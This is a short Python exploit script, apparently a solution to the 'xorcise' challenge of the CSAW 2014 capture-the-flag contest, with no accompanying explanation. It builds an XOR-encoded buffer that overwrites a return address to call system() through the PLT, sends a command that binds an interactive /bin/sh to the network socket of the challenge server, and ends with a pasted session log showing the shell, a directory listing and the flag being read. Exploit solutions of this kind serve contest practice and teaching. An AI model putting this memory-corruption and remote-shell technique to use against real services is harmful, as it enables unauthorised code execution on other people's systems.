#!/usr/bin/env python
import struct, sys, time
from nulllife import *

#CSAW 2014 CTF
#xorcise exploit

def xor(data, key):
	o = ''
	for i in range(len(data)):
		o += chr(ord(data[i]) ^ ord(key[i%len(key)]) ^ 0x8F)
	return o
key = "\x8F"  + "\x8A" + "\x8F" * 3 +  "\x9C" + "\x7B" + "\x99" #overwrite ret decipher x plt@system
cmd = "/bin/sh -i <&4 >&4 2>&4"
cmd += "\x00" * (128 - len(cmd))
s = NullSocket("128.238.66.227", 24001)
s.write(chr(135) + key + xor(cmd, key))
s.interactive()
'''
sh: cannot set terminal process group (134): Inappropriate ioctl for device
sh: no job control in this shell
sh-4.3$ id
id
uid=1000(xor) gid=1000(xor) groups=1000(xor)
sh-4.3$ ls -la
ls -la
total 44
drwxr-xr-x 2 root root  4096 Sep 20 00:18 .
drwxr-xr-x 3 root root  4096 Sep 14 14:14 ..
-rw-r--r-- 1 root root    30 Sep 20 00:18 flag.txt
-rw-r--r-- 1 root root     7 Sep 12 19:13 password.txt
-rwxr-xr-x 1 root root 12308 Sep 12 19:08 xorcise
-rw-r--r-- 1 root root 10248 Sep 10 13:16 xorcise.c
sh-4.3$ cat flag.txt
ceat flag.txt
flag{code_exec>=crypto_break}
sh-4.3$ exit
exit
exit
*** Connection closed by remote host ***
'''